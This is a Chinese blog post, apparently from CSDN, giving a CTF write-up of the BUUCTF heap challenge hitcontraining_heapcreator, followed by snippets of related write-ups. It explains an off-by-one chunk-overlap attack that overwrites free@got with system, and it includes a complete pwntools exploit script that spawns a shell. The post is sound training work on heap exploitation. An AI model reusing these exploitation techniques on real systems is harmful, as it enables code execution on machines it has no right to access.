hitcontraining_heapcreator

最新推荐文章于 2024-07-11 11:23:59 发布
原创 最新推荐文章于 2024-07-11 11:23:59 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #wp #网络安全 #信息安全 #python

这篇博客详细介绍了如何利用off-by-one漏洞来攻击一个名为hitcontraining_heapcreator的程序。作者通过分析程序的内存分配和编辑功能,发现了一个off-by-one错误,并利用这个错误覆盖了相邻chunk的size字段,进而操纵内存分配,控制free@got的地址,最终实现system调用,执行/bin/sh。整个过程包括创建和编辑chunk、泄露libc地址、修改free@got为system地址,最后触发系统调用来获取shell。
部署运行你感兴趣的模型镜像

hitcontraining_heapcreator

使用checksec查看:
在这里插入图片描述
开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:
在这里插入图片描述
看到菜单,堆题,放进IDA中查看:
在这里插入图片描述
分布来查看,首先是create_heap()
在这里插入图片描述

  • heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk
  • v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址

edit_heap()
在这里插入图片描述

  • read_input(*((_QWORD *)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);:末尾多加了1 ,明显的off-by-one漏洞

show()
在这里插入图片描述

  • 没啥问题,就显示出内容

delete_heap()
在这里插入图片描述

  • heaparray[v1] = 0LL;指针清了,也没啥问题。

题目思路

  • 全局看下来只存在了一个off-by-one漏洞。
  • 利用 off by one 漏洞覆盖下一个 chunk 的 size 字段。
  • 从而构造fake_chunk 大小。
  • 申请fake_chunk 大小
  • 产生 chunk overlap,进而修改关键指针。

步骤解析

程序自动创建的chunk大小是0x10,所以本题我们也使用这个大小。
首先创建三个chunk

在这里插入图片描述
在这里插入图片描述

通过off-by-one修改chunk0,覆盖到程序创建的chunk1的size位

在这里插入图片描述

接着free掉chunk1

在这里插入图片描述

可以看到free掉的chunk进入了fastbin中的0x80位置,此时在申请一个0x70大小的chunk,就能将这个0x80块申请出来

此时chunk2的指针没有更改,系统创建的chunk2还是存放着用户创建的chunk2的地址

我们可以将该地址修改成free@got的地址,泄露出libc的地址。

在这里插入图片描述
在这里插入图片描述

接着修改chunk2,对应得就会修改free@got所指向的地址,将该地址修改成system的地址

调用free时,就会调用system,前面已经将chunk0的内容改为/bin/sh

所以free(0)就会变成system('/bin/sh')

完整exp:

from pwn import *

#start
# r = remote('node4.buuoj.cn',29754)
r = process("../buu/hitcontraining_heapcreator")
elf = ELF("../buu/hitcontraining_heapcreator")
libc = ELF("../buu/ubuntu16(64).so")
context.log_level='debug'
gdb.attach(r,"b *0x4008FA")

def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("Heap : ",str(size))
    r.sendlineafter("heap:",content)

def edit(idx,content):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))
    r.sendlineafter("heap : ",content)

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))

def delete(idx):
    r.sendlineafter("choice :",'4')
    r.sendlineafter("Index :",str(idx))

#params
free_got = elf.got['free']

#attack
add(0x18,"MMMM")
add(0x10,"MMMM")
add(0x10,"MMMM")
# gdb.attach(r)

edit(0,b'/bin/sh\x00'+p64(0)*2+b'\x81')
# gdb.attach(r)
delete(1)

add(0x70,p64(0)*8+p64(0x8)+p64(free_got))
show(2)
free_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

edit(2,p64(system_addr))
#gdb.attach(r)
delete(0)

r.interactive()

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 619
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
BUUCTF hitcontraining_heapcreator
最新发布
2401_85052854的博客
04-18 457
由于该程序没有system,所以我们要泄露libc,通过在0x80这个大小范围内修改掉第三个chunk的地址,泄露出free的真实地址,因为这个题目在我们申请一个chunk的时候实际上他会生成两个chunk,第一个会存放后面chunk的大小和下一个chunk的地址,由于我们有0x81个字节可以覆盖,完全可以把我们之前申请的第二个chunk的地址给改成free_got,这样我们show(2)就会把free的真实地址泄露出来。之后调用edit进行对堆内容的修改,进行堆溢出从而修改下一个chunk的大小。
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 1204
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1167
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
2301_79326813的博客
01-17 782
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 983
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
[off by one] hitcontraining_heapcreator
huzai9527的博客
04-01 563
[off by one] hitcontraining_heapcreator 本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体 从内存情况推测结构体 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配 struct test{ int size; char *content; } exp from pwn import * #p = remote('node3.buuoj.cn',27554) p
HITCON Trainging lab13——heapcreator
04-19 315
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 1149
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题堆上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建堆函数看数据结构 结构...
hitcontraining magicheap
pondzhang的专栏
06-16 400
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
hitcontraining_magicheap
z1r0的博客
12-23 311
hitcontraining_magicheap 查看保护 magic <= 0x1305即可getshell。 edit的时候没有注意size,可以堆溢出,没有pie直接unstoredbin attack。具体的attack看我的blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remo
【unstored bin attack】hitcontraining_magicheap
huzai9527的博客
04-14 205
【unstored bin attack】 1.ida分析 2.思路 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数 3.exp from pwn import * p = remote('node3.buuoj.cn',25879) #p = process('./magicheap') context.log_level = 'debug' def add(size,cont): p.sendlin
BUUCTF【hitcontraining_magicheap】
weixin_51055545的博客
02-13 1804
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1455
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 460
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
hitcontraining_magicheap--(基础堆)
2301_80168334的博客
06-27 902
接下来又是对v3进行判断,如果v3>3,接着判断v3是否等于4,如果等于4就exit(0)退出。可以知道这里首先是输入index,并且读取到的数值赋值给了v1,v1还要进行判断,且与create_heap函数中的chunk是有关系的。=2则是会输出"Invalid Choice",else则是进入到edit_heap函数中。,因为malloc () 函数。接下来还是对v3进行判断,如果v3==1则进入到create_heap()函数中。分析完大概得意思了,就进行一个函数一个函数的查看,寻找解题的关键点。
hitcontraining_magicheap-unlink
个人笔记
06-17 328
heaparray全局指针=0x6020C0;
BUUCTF hitcontraining_magicheap
zwb2603096342的博客
07-11 669
pwn,unsortedbin attack
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值